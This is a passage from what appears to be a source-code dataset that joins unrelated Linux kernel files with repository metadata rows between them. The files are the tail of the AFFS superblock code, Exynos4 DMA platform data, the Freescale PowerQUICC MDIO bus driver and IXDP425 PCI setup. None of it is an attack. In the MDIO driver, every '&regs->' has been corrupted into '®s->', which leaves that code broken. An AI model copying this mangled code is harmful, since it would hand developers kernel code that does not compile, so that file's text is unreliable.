strlcpy(volume, vol, 32);
kfree(vol);
break;
}
case Opt_ignore:
/* Silently ignore the quota options */
break;
default:
printk("AFFS: Unrecognized mount option \"%s\" "
"or missing value\n", p);
return 0;
}
}
return 1;
}
/* This function definitely needs to be split up. Some fine day I'll
* hopefully have the guts to do so. Until then: sorry for the mess.
*/
static int affs_fill_super(struct super_block *sb, void *data, int silent)
{
struct affs_sb_info *sbi;
struct buffer_head *root_bh = NULL;
struct buffer_head *boot_bh;
struct inode *root_inode = NULL;
s32 root_block;
int size, blocksize;
u32 chksum;
int num_bm;
int i, j;
s32 key;
uid_t uid;
gid_t gid;
int reserved;
unsigned long mount_flags;
int tmp_flags; /* fix remount prototype... */
u8 sig[4];
int ret = -EINVAL;
save_mount_options(sb, data);
pr_debug("AFFS: read_super(%s)\n",data ? (const char *)data : "no options");
sb->s_magic = AFFS_SUPER_MAGIC;
sb->s_op = &affs_sops;
sb->s_flags |= MS_NODIRATIME;
sbi = kzalloc(sizeof(struct affs_sb_info), GFP_KERNEL);
if (!sbi)
return -ENOMEM;
sb->s_fs_info = sbi;
mutex_init(&sbi->s_bmlock);
spin_lock_init(&sbi->symlink_lock);
if (!parse_options(data,&uid,&gid,&i,&reserved,&root_block,
&blocksize,&sbi->s_prefix,
sbi->s_volume, &mount_flags)) {
printk(KERN_ERR "AFFS: Error parsing options\n");
kfree(sbi->s_prefix);
kfree(sbi);
return -EINVAL;
}
/* N.B. after this point s_prefix must be released */
sbi->s_flags = mount_flags;
sbi->s_mode = i;
sbi->s_uid = uid;
sbi->s_gid = gid;
sbi->s_reserved= reserved;
/* Get the size of the device in 512-byte blocks.
* If we later see that the partition uses bigger
* blocks, we will have to change it.
*/
size = sb->s_bdev->bd_inode->i_size >> 9;
pr_debug("AFFS: initial blocksize=%d, #blocks=%d\n", 512, size);
affs_set_blocksize(sb, PAGE_SIZE);
/* Try to find root block. Its location depends on the block size. */
i = 512;
j = 4096;
if (blocksize > 0) {
i = j = blocksize;
size = size / (blocksize / 512);
}
for (blocksize = i, key = 0; blocksize <= j; blocksize <<= 1, size >>= 1) {
sbi->s_root_block = root_block;
if (root_block < 0)
sbi->s_root_block = (reserved + size - 1) / 2;
pr_debug("AFFS: setting blocksize to %d\n", blocksize);
affs_set_blocksize(sb, blocksize);
sbi->s_partition_size = size;
/* The root block location that was calculated above is not
* correct if the partition size is an odd number of 512-
* byte blocks, which will be rounded down to a number of
* 1024-byte blocks, and if there were an even number of
* reserved blocks. Ideally, all partition checkers should
* report the real number of blocks of the real blocksize,
* but since this just cannot be done, we have to try to
* find the root block anyways. In the above case, it is one
* block behind the calculated one. So we check this one, too.
*/
for (num_bm = 0; num_bm < 2; num_bm++) {
pr_debug("AFFS: Dev %s, trying root=%u, bs=%d, "
"size=%d, reserved=%d\n",
sb->s_id,
sbi->s_root_block + num_bm,
blocksize, size, reserved);
root_bh = affs_bread(sb, sbi->s_root_block + num_bm);
if (!root_bh)
continue;
if (!affs_checksum_block(sb, root_bh) &&
be32_to_cpu(AFFS_ROOT_HEAD(root_bh)->ptype) == T_SHORT &&
be32_to_cpu(AFFS_ROOT_TAIL(sb, root_bh)->stype) == ST_ROOT) {
sbi->s_hashsize = blocksize / 4 - 56;
sbi->s_root_block += num_bm;
key = 1;
goto got_root;
}
affs_brelse(root_bh);
root_bh = NULL;
}
}
if (!silent)
printk(KERN_ERR "AFFS: No valid root block on device %s\n",
sb->s_id);
goto out_error;
/* N.B. after this point bh must be released */
got_root:
root_block = sbi->s_root_block;
/* Find out which kind of FS we have */
boot_bh = sb_bread(sb, 0);
if (!boot_bh) {
printk(KERN_ERR "AFFS: Cannot read boot block\n");
goto out_error;
}
memcpy(sig, boot_bh->b_data, 4);
brelse(boot_bh);
chksum = be32_to_cpu(*(__be32 *)sig);
/* Dircache filesystems are compatible with non-dircache ones
* when reading. As long as they aren't supported, writing is
* not recommended.
*/
if ((chksum == FS_DCFFS || chksum == MUFS_DCFFS || chksum == FS_DCOFS
|| chksum == MUFS_DCOFS) && !(sb->s_flags & MS_RDONLY)) {
printk(KERN_NOTICE "AFFS: Dircache FS - mounting %s read only\n",
sb->s_id);
sb->s_flags |= MS_RDONLY;
}
switch (chksum) {
case MUFS_FS:
case MUFS_INTLFFS:
case MUFS_DCFFS:
sbi->s_flags |= SF_MUFS;
/* fall thru */
case FS_INTLFFS:
case FS_DCFFS:
sbi->s_flags |= SF_INTL;
break;
case MUFS_FFS:
sbi->s_flags |= SF_MUFS;
break;
case FS_FFS:
break;
case MUFS_OFS:
sbi->s_flags |= SF_MUFS;
/* fall thru */
case FS_OFS:
sbi->s_flags |= SF_OFS;
sb->s_flags |= MS_NOEXEC;
break;
case MUFS_DCOFS:
case MUFS_INTLOFS:
sbi->s_flags |= SF_MUFS;
case FS_DCOFS:
case FS_INTLOFS:
sbi->s_flags |= SF_INTL | SF_OFS;
sb->s_flags |= MS_NOEXEC;
break;
default:
printk(KERN_ERR "AFFS: Unknown filesystem on device %s: %08X\n",
sb->s_id, chksum);
goto out_error;
}
if (mount_flags & SF_VERBOSE) {
u8 len = AFFS_ROOT_TAIL(sb, root_bh)->disk_name[0];
printk(KERN_NOTICE "AFFS: Mounting volume \"%.*s\": Type=%.3s\\%c, Blocksize=%d\n",
len > 31 ? 31 : len,
AFFS_ROOT_TAIL(sb, root_bh)->disk_name + 1,
sig, sig[3] + '0', blocksize);
}
sb->s_flags |= MS_NODEV | MS_NOSUID;
sbi->s_data_blksize = sb->s_blocksize;
if (sbi->s_flags & SF_OFS)
sbi->s_data_blksize -= 24;
/* Keep super block in cache */
sbi->s_root_bh = root_bh;
/* N.B. after this point s_root_bh must be released */
tmp_flags = sb->s_flags;
if (affs_init_bitmap(sb, &tmp_flags))
goto out_error;
sb->s_flags = tmp_flags;
/* set up enough so that it can read an inode */
root_inode = affs_iget(sb, root_block);
if (IS_ERR(root_inode)) {
ret = PTR_ERR(root_inode);
goto out_error;
}
if (AFFS_SB(sb)->s_flags & SF_INTL)
sb->s_d_op = &affs_intl_dentry_operations;
else
sb->s_d_op = &affs_dentry_operations;
sb->s_root = d_make_root(root_inode);
if (!sb->s_root) {
printk(KERN_ERR "AFFS: Get root inode failed\n");
goto out_error;
}
pr_debug("AFFS: s_flags=%lX\n",sb->s_flags);
return 0;
/*
* Begin the cascaded cleanup ...
*/
out_error:
kfree(sbi->s_bitmap);
affs_brelse(root_bh);
kfree(sbi->s_prefix);
kfree(sbi);
sb->s_fs_info = NULL;
return ret;
}
static int
affs_remount(struct super_block *sb, int *flags, char *data)
{
struct affs_sb_info *sbi = AFFS_SB(sb);
int blocksize;
uid_t uid;
gid_t gid;
int mode;
int reserved;
int root_block;
unsigned long mount_flags;
int res = 0;
char *new_opts = kstrdup(data, GFP_KERNEL);
char volume[32];
char *prefix = NULL;
pr_debug("AFFS: remount(flags=0x%x,opts=\"%s\")\n",*flags,data);
*flags |= MS_NODIRATIME;
memcpy(volume, sbi->s_volume, 32);
if (!parse_options(data, &uid, &gid, &mode, &reserved, &root_block,
&blocksize, &prefix, volume,
&mount_flags)) {
kfree(prefix);
kfree(new_opts);
return -EINVAL;
}
replace_mount_options(sb, new_opts);
sbi->s_flags = mount_flags;
sbi->s_mode = mode;
sbi->s_uid = uid;
sbi->s_gid = gid;
/* protect against readers */
spin_lock(&sbi->symlink_lock);
if (prefix) {
kfree(sbi->s_prefix);
sbi->s_prefix = prefix;
}
memcpy(sbi->s_volume, volume, 32);
spin_unlock(&sbi->symlink_lock);
if ((*flags & MS_RDONLY) == (sb->s_flags & MS_RDONLY))
return 0;
if (*flags & MS_RDONLY) {
affs_write_super(sb);
affs_free_bitmap(sb);
} else
res = affs_init_bitmap(sb, flags);
return res;
}
static int
affs_statfs(struct dentry *dentry, struct kstatfs *buf)
{
struct super_block *sb = dentry->d_sb;
int free;
u64 id = huge_encode_dev(sb->s_bdev->bd_dev);
pr_debug("AFFS: statfs() partsize=%d, reserved=%d\n",AFFS_SB(sb)->s_partition_size,
AFFS_SB(sb)->s_reserved);
free = affs_count_free_blocks(sb);
buf->f_type = AFFS_SUPER_MAGIC;
buf->f_bsize = sb->s_blocksize;
buf->f_blocks = AFFS_SB(sb)->s_partition_size - AFFS_SB(sb)->s_reserved;
buf->f_bfree = free;
buf->f_bavail = free;
buf->f_fsid.val[0] = (u32)id;
buf->f_fsid.val[1] = (u32)(id >> 32);
buf->f_namelen = 30;
return 0;
}
static struct dentry *affs_mount(struct file_system_type *fs_type,
int flags, const char *dev_name, void *data)
{
return mount_bdev(fs_type, flags, dev_name, data, affs_fill_super);
}
static struct file_system_type affs_fs_type = {
.owner = THIS_MODULE,
.name = "affs",
.mount = affs_mount,
.kill_sb = kill_block_super,
.fs_flags = FS_REQUIRES_DEV,
};
static int __init init_affs_fs(void)
{
int err = init_inodecache();
if (err)
goto out1;
err = register_filesystem(&affs_fs_type);
if (err)
goto out;
return 0;
out:
destroy_inodecache();
out1:
return err;
}
static void __exit exit_affs_fs(void)
{
unregister_filesystem(&affs_fs_type);
destroy_inodecache();
}
MODULE_DESCRIPTION("Amiga filesystem support for Linux");
MODULE_LICENSE("GPL");
module_init(init_affs_fs)
module_exit(exit_affs_fs)
| gpl-2.0 |
sub77/matissewifi | arch/arm/mach-exynos/dma.c | 4611 | 5390 | /* linux/arch/arm/mach-exynos4/dma.c
*
* Copyright (c) 2011 Samsung Electronics Co., Ltd.
* http://www.samsung.com
*
* Copyright (C) 2010 Samsung Electronics Co. Ltd.
* Jaswinder Singh <jassi.brar@samsung.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
#include <linux/dma-mapping.h>
#include <linux/amba/bus.h>
#include <linux/amba/pl330.h>
#include <linux/of.h>
#include <asm/irq.h>
#include <plat/devs.h>
#include <plat/irqs.h>
#include <plat/cpu.h>
#include <mach/map.h>
#include <mach/irqs.h>
#include <mach/dma.h>
static u8 exynos4210_pdma0_peri[] = {
DMACH_PCM0_RX,
DMACH_PCM0_TX,
DMACH_PCM2_RX,
DMACH_PCM2_TX,
DMACH_MSM_REQ0,
DMACH_MSM_REQ2,
DMACH_SPI0_RX,
DMACH_SPI0_TX,
DMACH_SPI2_RX,
DMACH_SPI2_TX,
DMACH_I2S0S_TX,
DMACH_I2S0_RX,
DMACH_I2S0_TX,
DMACH_I2S2_RX,
DMACH_I2S2_TX,
DMACH_UART0_RX,
DMACH_UART0_TX,
DMACH_UART2_RX,
DMACH_UART2_TX,
DMACH_UART4_RX,
DMACH_UART4_TX,
DMACH_SLIMBUS0_RX,
DMACH_SLIMBUS0_TX,
DMACH_SLIMBUS2_RX,
DMACH_SLIMBUS2_TX,
DMACH_SLIMBUS4_RX,
DMACH_SLIMBUS4_TX,
DMACH_AC97_MICIN,
DMACH_AC97_PCMIN,
DMACH_AC97_PCMOUT,
};
static u8 exynos4212_pdma0_peri[] = {
DMACH_PCM0_RX,
DMACH_PCM0_TX,
DMACH_PCM2_RX,
DMACH_PCM2_TX,
DMACH_MIPI_HSI0,
DMACH_MIPI_HSI1,
DMACH_SPI0_RX,
DMACH_SPI0_TX,
DMACH_SPI2_RX,
DMACH_SPI2_TX,
DMACH_I2S0S_TX,
DMACH_I2S0_RX,
DMACH_I2S0_TX,
DMACH_I2S2_RX,
DMACH_I2S2_TX,
DMACH_UART0_RX,
DMACH_UART0_TX,
DMACH_UART2_RX,
DMACH_UART2_TX,
DMACH_UART4_RX,
DMACH_UART4_TX,
DMACH_SLIMBUS0_RX,
DMACH_SLIMBUS0_TX,
DMACH_SLIMBUS2_RX,
DMACH_SLIMBUS2_TX,
DMACH_SLIMBUS4_RX,
DMACH_SLIMBUS4_TX,
DMACH_AC97_MICIN,
DMACH_AC97_PCMIN,
DMACH_AC97_PCMOUT,
DMACH_MIPI_HSI4,
DMACH_MIPI_HSI5,
};
struct dma_pl330_platdata exynos4_pdma0_pdata;
static AMBA_AHB_DEVICE(exynos4_pdma0, "dma-pl330.0", 0x00041330,
EXYNOS4_PA_PDMA0, {EXYNOS4_IRQ_PDMA0}, &exynos4_pdma0_pdata);
static u8 exynos4210_pdma1_peri[] = {
DMACH_PCM0_RX,
DMACH_PCM0_TX,
DMACH_PCM1_RX,
DMACH_PCM1_TX,
DMACH_MSM_REQ1,
DMACH_MSM_REQ3,
DMACH_SPI1_RX,
DMACH_SPI1_TX,
DMACH_I2S0S_TX,
DMACH_I2S0_RX,
DMACH_I2S0_TX,
DMACH_I2S1_RX,
DMACH_I2S1_TX,
DMACH_UART0_RX,
DMACH_UART0_TX,
DMACH_UART1_RX,
DMACH_UART1_TX,
DMACH_UART3_RX,
DMACH_UART3_TX,
DMACH_SLIMBUS1_RX,
DMACH_SLIMBUS1_TX,
DMACH_SLIMBUS3_RX,
DMACH_SLIMBUS3_TX,
DMACH_SLIMBUS5_RX,
DMACH_SLIMBUS5_TX,
};
static u8 exynos4212_pdma1_peri[] = {
DMACH_PCM0_RX,
DMACH_PCM0_TX,
DMACH_PCM1_RX,
DMACH_PCM1_TX,
DMACH_MIPI_HSI2,
DMACH_MIPI_HSI3,
DMACH_SPI1_RX,
DMACH_SPI1_TX,
DMACH_I2S0S_TX,
DMACH_I2S0_RX,
DMACH_I2S0_TX,
DMACH_I2S1_RX,
DMACH_I2S1_TX,
DMACH_UART0_RX,
DMACH_UART0_TX,
DMACH_UART1_RX,
DMACH_UART1_TX,
DMACH_UART3_RX,
DMACH_UART3_TX,
DMACH_SLIMBUS1_RX,
DMACH_SLIMBUS1_TX,
DMACH_SLIMBUS3_RX,
DMACH_SLIMBUS3_TX,
DMACH_SLIMBUS5_RX,
DMACH_SLIMBUS5_TX,
DMACH_SLIMBUS0AUX_RX,
DMACH_SLIMBUS0AUX_TX,
DMACH_SPDIF,
DMACH_MIPI_HSI6,
DMACH_MIPI_HSI7,
};
static struct dma_pl330_platdata exynos4_pdma1_pdata;
static AMBA_AHB_DEVICE(exynos4_pdma1, "dma-pl330.1", 0x00041330,
EXYNOS4_PA_PDMA1, {EXYNOS4_IRQ_PDMA1}, &exynos4_pdma1_pdata);
static u8 mdma_peri[] = {
DMACH_MTOM_0,
DMACH_MTOM_1,
DMACH_MTOM_2,
DMACH_MTOM_3,
DMACH_MTOM_4,
DMACH_MTOM_5,
DMACH_MTOM_6,
DMACH_MTOM_7,
};
static struct dma_pl330_platdata exynos4_mdma1_pdata = {
.nr_valid_peri = ARRAY_SIZE(mdma_peri),
.peri_id = mdma_peri,
};
static AMBA_AHB_DEVICE(exynos4_mdma1, "dma-pl330.2", 0x00041330,
EXYNOS4_PA_MDMA1, {EXYNOS4_IRQ_MDMA1}, &exynos4_mdma1_pdata);
static int __init exynos4_dma_init(void)
{
if (of_have_populated_dt())
return 0;
if (soc_is_exynos4210()) {
exynos4_pdma0_pdata.nr_valid_peri =
ARRAY_SIZE(exynos4210_pdma0_peri);
exynos4_pdma0_pdata.peri_id = exynos4210_pdma0_peri;
exynos4_pdma1_pdata.nr_valid_peri =
ARRAY_SIZE(exynos4210_pdma1_peri);
exynos4_pdma1_pdata.peri_id = exynos4210_pdma1_peri;
} else if (soc_is_exynos4212() || soc_is_exynos4412()) {
exynos4_pdma0_pdata.nr_valid_peri =
ARRAY_SIZE(exynos4212_pdma0_peri);
exynos4_pdma0_pdata.peri_id = exynos4212_pdma0_peri;
exynos4_pdma1_pdata.nr_valid_peri =
ARRAY_SIZE(exynos4212_pdma1_peri);
exynos4_pdma1_pdata.peri_id = exynos4212_pdma1_peri;
}
dma_cap_set(DMA_SLAVE, exynos4_pdma0_pdata.cap_mask);
dma_cap_set(DMA_CYCLIC, exynos4_pdma0_pdata.cap_mask);
amba_device_register(&exynos4_pdma0_device, &iomem_resource);
dma_cap_set(DMA_SLAVE, exynos4_pdma1_pdata.cap_mask);
dma_cap_set(DMA_CYCLIC, exynos4_pdma1_pdata.cap_mask);
amba_device_register(&exynos4_pdma1_device, &iomem_resource);
dma_cap_set(DMA_MEMCPY, exynos4_mdma1_pdata.cap_mask);
amba_device_register(&exynos4_mdma1_device, &iomem_resource);
return 0;
}
arch_initcall(exynos4_dma_init);
| gpl-2.0 |
kamarush/android_kernel_lge_hammerhead | drivers/net/ethernet/freescale/fsl_pq_mdio.c | 4867 | 10805 | /*
* Freescale PowerQUICC Ethernet Driver -- MIIM bus implementation
* Provides Bus interface for MIIM regs
*
* Author: Andy Fleming <afleming@freescale.com>
* Modifier: Sandeep Gopalpet <sandeep.kumar@freescale.com>
*
* Copyright 2002-2004, 2008-2009 Freescale Semiconductor, Inc.
*
* Based on gianfar_mii.c and ucc_geth_mii.c (Li Yang, Kim Phillips)
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
*/
#include <linux/kernel.h>
#include <linux/string.h>
#include <linux/errno.h>
#include <linux/unistd.h>
#include <linux/slab.h>
#include <linux/interrupt.h>
#include <linux/init.h>
#include <linux/delay.h>
#include <linux/netdevice.h>
#include <linux/etherdevice.h>
#include <linux/skbuff.h>
#include <linux/spinlock.h>
#include <linux/mm.h>
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/crc32.h>
#include <linux/mii.h>
#include <linux/phy.h>
#include <linux/of.h>
#include <linux/of_address.h>
#include <linux/of_mdio.h>
#include <linux/of_platform.h>
#include <asm/io.h>
#include <asm/irq.h>
#include <asm/uaccess.h>
#include <asm/ucc.h>
#include "gianfar.h"
#include "fsl_pq_mdio.h"
struct fsl_pq_mdio_priv {
void __iomem *map;
struct fsl_pq_mdio __iomem *regs;
};
/*
* Write value to the PHY at mii_id at register regnum,
* on the bus attached to the local interface, which may be different from the
* generic mdio bus (tied to a single interface), waiting until the write is
* done before returning. This is helpful in programming interfaces like
* the TBI which control interfaces like onchip SERDES and are always tied to
* the local mdio pins, which may not be the same as system mdio bus, used for
* controlling the external PHYs, for example.
*/
int fsl_pq_local_mdio_write(struct fsl_pq_mdio __iomem *regs, int mii_id,
int regnum, u16 value)
{
/* Set the PHY address and the register address we want to write */
out_be32(®s->miimadd, (mii_id << 8) | regnum);
/* Write out the value we want */
out_be32(®s->miimcon, value);
/* Wait for the transaction to finish */
while (in_be32(®s->miimind) & MIIMIND_BUSY)
cpu_relax();
return 0;
}
/*
* Read the bus for PHY at addr mii_id, register regnum, and
* return the value. Clears miimcom first. All PHY operation
* done on the bus attached to the local interface,
* which may be different from the generic mdio bus
* This is helpful in programming interfaces like
* the TBI which, in turn, control interfaces like onchip SERDES
* and are always tied to the local mdio pins, which may not be the
* same as system mdio bus, used for controlling the external PHYs, for eg.
*/
int fsl_pq_local_mdio_read(struct fsl_pq_mdio __iomem *regs,
int mii_id, int regnum)
{
u16 value;
/* Set the PHY address and the register address we want to read */
out_be32(®s->miimadd, (mii_id << 8) | regnum);
/* Clear miimcom, and then initiate a read */
out_be32(®s->miimcom, 0);
out_be32(®s->miimcom, MII_READ_COMMAND);
/* Wait for the transaction to finish */
while (in_be32(®s->miimind) & (MIIMIND_NOTVALID | MIIMIND_BUSY))
cpu_relax();
/* Grab the value of the register from miimstat */
value = in_be32(®s->miimstat);
return value;
}
static struct fsl_pq_mdio __iomem *fsl_pq_mdio_get_regs(struct mii_bus *bus)
{
struct fsl_pq_mdio_priv *priv = bus->priv;
return priv->regs;
}
/*
* Write value to the PHY at mii_id at register regnum,
* on the bus, waiting until the write is done before returning.
*/
int fsl_pq_mdio_write(struct mii_bus *bus, int mii_id, int regnum, u16 value)
{
struct fsl_pq_mdio __iomem *regs = fsl_pq_mdio_get_regs(bus);
/* Write to the local MII regs */
return fsl_pq_local_mdio_write(regs, mii_id, regnum, value);
}
/*
* Read the bus for PHY at addr mii_id, register regnum, and
* return the value. Clears miimcom first.
*/
int fsl_pq_mdio_read(struct mii_bus *bus, int mii_id, int regnum)
{
struct fsl_pq_mdio __iomem *regs = fsl_pq_mdio_get_regs(bus);
/* Read the local MII regs */
return fsl_pq_local_mdio_read(regs, mii_id, regnum);
}
/* Reset the MIIM registers, and wait for the bus to free */
static int fsl_pq_mdio_reset(struct mii_bus *bus)
{
struct fsl_pq_mdio __iomem *regs = fsl_pq_mdio_get_regs(bus);
int timeout = PHY_INIT_TIMEOUT;
mutex_lock(&bus->mdio_lock);
/* Reset the management interface */
out_be32(®s->miimcfg, MIIMCFG_RESET);
/* Setup the MII Mgmt clock speed */
out_be32(®s->miimcfg, MIIMCFG_INIT_VALUE);
/* Wait until the bus is free */
while ((in_be32(®s->miimind) & MIIMIND_BUSY) && timeout--)
cpu_relax();
mutex_unlock(&bus->mdio_lock);
if (timeout < 0) {
printk(KERN_ERR "%s: The MII Bus is stuck!\n",
bus->name);
return -EBUSY;
}
return 0;
}
void fsl_pq_mdio_bus_name(char *name, struct device_node *np)
{
const u32 *addr;
u64 taddr = OF_BAD_ADDR;
addr = of_get_address(np, 0, NULL, NULL);
if (addr)
taddr = of_translate_address(np, addr);
snprintf(name, MII_BUS_ID_SIZE, "%s@%llx", np->name,
(unsigned long long)taddr);
}
EXPORT_SYMBOL_GPL(fsl_pq_mdio_bus_name);
static u32 __iomem *get_gfar_tbipa(struct fsl_pq_mdio __iomem *regs, struct device_node *np)
{
#if defined(CONFIG_GIANFAR) || defined(CONFIG_GIANFAR_MODULE)
struct gfar __iomem *enet_regs;
/*
* This is mildly evil, but so is our hardware for doing this.
* Also, we have to cast back to struct gfar because of
* definition weirdness done in gianfar.h.
*/
if(of_device_is_compatible(np, "fsl,gianfar-mdio") ||
of_device_is_compatible(np, "fsl,gianfar-tbi") ||
of_device_is_compatible(np, "gianfar")) {
enet_regs = (struct gfar __iomem *)regs;
return &enet_regs->tbipa;
} else if (of_device_is_compatible(np, "fsl,etsec2-mdio") ||
of_device_is_compatible(np, "fsl,etsec2-tbi")) {
return of_iomap(np, 1);
}
#endif
return NULL;
}
static int get_ucc_id_for_range(u64 start, u64 end, u32 *ucc_id)
{
#if defined(CONFIG_UCC_GETH) || defined(CONFIG_UCC_GETH_MODULE)
struct device_node *np = NULL;
int err = 0;
for_each_compatible_node(np, NULL, "ucc_geth") {
struct resource tempres;
err = of_address_to_resource(np, 0, &tempres);
if (err)
continue;
/* if our mdio regs fall within this UCC regs range */
if ((start >= tempres.start) && (end <= tempres.end)) {
/* Find the id of the UCC */
const u32 *id;
id = of_get_property(np, "cell-index", NULL);
if (!id) {
id = of_get_property(np, "device-id", NULL);
if (!id)
continue;
}
*ucc_id = *id;
return 0;
}
}
if (err)
return err;
else
return -EINVAL;
#else
return -ENODEV;
#endif
}
static int fsl_pq_mdio_probe(struct platform_device *ofdev)
{
struct device_node *np = ofdev->dev.of_node;
struct device_node *tbi;
struct fsl_pq_mdio_priv *priv;
struct fsl_pq_mdio __iomem *regs = NULL;
void __iomem *map;
u32 __iomem *tbipa;
struct mii_bus *new_bus;
int tbiaddr = -1;
const u32 *addrp;
u64 addr = 0, size = 0;
int err;
priv = kzalloc(sizeof(*priv), GFP_KERNEL);
if (!priv)
return -ENOMEM;
new_bus = mdiobus_alloc();
if (!new_bus) {
err = -ENOMEM;
goto err_free_priv;
}
new_bus->name = "Freescale PowerQUICC MII Bus",
new_bus->read = &fsl_pq_mdio_read,
new_bus->write = &fsl_pq_mdio_write,
new_bus->reset = &fsl_pq_mdio_reset,
new_bus->priv = priv;
fsl_pq_mdio_bus_name(new_bus->id, np);
addrp = of_get_address(np, 0, &size, NULL);
if (!addrp) {
err = -EINVAL;
goto err_free_bus;
}
/* Set the PHY base address */
addr = of_translate_address(np, addrp);
if (addr == OF_BAD_ADDR) {
err = -EINVAL;
goto err_free_bus;
}
map = ioremap(addr, size);
if (!map) {
err = -ENOMEM;
goto err_free_bus;
}
priv->map = map;
if (of_device_is_compatible(np, "fsl,gianfar-mdio") ||
of_device_is_compatible(np, "fsl,gianfar-tbi") ||
of_device_is_compatible(np, "fsl,ucc-mdio") ||
of_device_is_compatible(np, "ucc_geth_phy"))
map -= offsetof(struct fsl_pq_mdio, miimcfg);
regs = map;
priv->regs = regs;
new_bus->irq = kcalloc(PHY_MAX_ADDR, sizeof(int), GFP_KERNEL);
if (NULL == new_bus->irq) {
err = -ENOMEM;
goto err_unmap_regs;
}
new_bus->parent = &ofdev->dev;
dev_set_drvdata(&ofdev->dev, new_bus);
if (of_device_is_compatible(np, "fsl,gianfar-mdio") ||
of_device_is_compatible(np, "fsl,gianfar-tbi") ||
of_device_is_compatible(np, "fsl,etsec2-mdio") ||
of_device_is_compatible(np, "fsl,etsec2-tbi") ||
of_device_is_compatible(np, "gianfar")) {
tbipa = get_gfar_tbipa(regs, np);
if (!tbipa) {
err = -EINVAL;
goto err_free_irqs;
}
} else if (of_device_is_compatible(np, "fsl,ucc-mdio") ||
of_device_is_compatible(np, "ucc_geth_phy")) {
u32 id;
static u32 mii_mng_master;
tbipa = ®s->utbipar;
if ((err = get_ucc_id_for_range(addr, addr + size, &id)))
goto err_free_irqs;
if (!mii_mng_master) {
mii_mng_master = id;
ucc_set_qe_mux_mii_mng(id - 1);
}
} else {
err = -ENODEV;
goto err_free_irqs;
}
for_each_child_of_node(np, tbi) {
if (!strncmp(tbi->type, "tbi-phy", 8))
break;
}
if (tbi) {
const u32 *prop = of_get_property(tbi, "reg", NULL);
if (prop)
tbiaddr = *prop;
if (tbiaddr == -1) {
err = -EBUSY;
goto err_free_irqs;
} else {
out_be32(tbipa, tbiaddr);
}
}
err = of_mdiobus_register(new_bus, np);
if (err) {
printk (KERN_ERR "%s: Cannot register as MDIO bus\n",
new_bus->name);
goto err_free_irqs;
}
return 0;
err_free_irqs:
kfree(new_bus->irq);
err_unmap_regs:
iounmap(priv->map);
err_free_bus:
kfree(new_bus);
err_free_priv:
kfree(priv);
return err;
}
static int fsl_pq_mdio_remove(struct platform_device *ofdev)
{
struct device *device = &ofdev->dev;
struct mii_bus *bus = dev_get_drvdata(device);
struct fsl_pq_mdio_priv *priv = bus->priv;
mdiobus_unregister(bus);
dev_set_drvdata(device, NULL);
iounmap(priv->map);
bus->priv = NULL;
mdiobus_free(bus);
kfree(priv);
return 0;
}
static struct of_device_id fsl_pq_mdio_match[] = {
{
.type = "mdio",
.compatible = "ucc_geth_phy",
},
{
.type = "mdio",
.compatible = "gianfar",
},
{
.compatible = "fsl,ucc-mdio",
},
{
.compatible = "fsl,gianfar-tbi",
},
{
.compatible = "fsl,gianfar-mdio",
},
{
.compatible = "fsl,etsec2-tbi",
},
{
.compatible = "fsl,etsec2-mdio",
},
{},
};
MODULE_DEVICE_TABLE(of, fsl_pq_mdio_match);
static struct platform_driver fsl_pq_mdio_driver = {
.driver = {
.name = "fsl-pq_mdio",
.owner = THIS_MODULE,
.of_match_table = fsl_pq_mdio_match,
},
.probe = fsl_pq_mdio_probe,
.remove = fsl_pq_mdio_remove,
};
module_platform_driver(fsl_pq_mdio_driver);
MODULE_LICENSE("GPL");
| gpl-2.0 |
hiepgia/kernel_hlte_lollipop | arch/arm/mach-ixp4xx/ixdp425-pci.c | 5379 | 1914 | /*
* arch/arm/mach-ixp4xx/ixdp425-pci.c
*
* IXDP425 board-level PCI initialization
*
* Copyright (C) 2002 Intel Corporation.
* Copyright (C) 2003-2004 MontaVista Software, Inc.
*
* Maintainer: Deepak Saxena <dsaxena@plexity.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
*/
#include <linux/kernel.h>
#include <linux/pci.h>
#include <linux/init.h>
#include <linux/irq.h>
#include <linux/delay.h>
#include <asm/mach/pci.h>
#include <asm/irq.h>
#include <mach/hardware.h>
#include <asm/mach-types.h>
#define MAX_DEV 4
#define IRQ_LINES 4
/* PCI controller GPIO to IRQ pin mappings */
#define INTA 11
#define INTB 10
#define INTC 9
#define INTD 8
void __init ixdp425_pci_preinit(void)
{
irq_set_irq_type(IXP4XX_GPIO_IRQ(INTA), IRQ_TYPE_LEVEL_LOW);
irq_set_irq_type(IXP4XX_GPIO_IRQ(INTB), IRQ_TYPE_LEVEL_LOW);
irq_set_irq_type(IXP4XX_GPIO_IRQ(INTC), IRQ_TYPE_LEVEL_LOW);
irq_set_irq_type(IXP4XX_GPIO_IRQ(INTD), IRQ_TYPE_LEVEL_LOW);
ixp4xx_pci_preinit();
}
static int __init ixdp425_map_irq(const struct pci_dev *dev, u8 slot, u8 pin)
{
static int pci_irq_table[IRQ_LINES] = {
IXP4XX_GPIO_IRQ(INTA),
IXP4XX_GPIO_IRQ(INTB),
IXP4XX_GPIO_IRQ(INTC),
IXP4XX_GPIO_IRQ(INTD)
};
if (slot >= 1 && slot <= MAX_DEV && pin >= 1 && pin <= IRQ_LINES)
return pci_irq_table[(slot + pin - 2) % 4];
return -1;
}
struct hw_pci ixdp425_pci __initdata = {
.nr_controllers = 1,
.preinit = ixdp425_pci_preinit,
.swizzle = pci_std_swizzle,
.setup = ixp4xx_setup,
.scan = ixp4xx_scan_bus,
.map_irq = ixdp425_map_irq,
};
int __init ixdp425_pci_init(void)
{
if (machine_is_ixdp425() || machine_is_ixcdp1100() ||
machine_is_ixdp465() || machine_is_kixrp435())
pci_common_init(&ixdp425_pci);
return 0;
}
subsys_initcall(ixdp425_pci_init);
| gpl-2.0 |
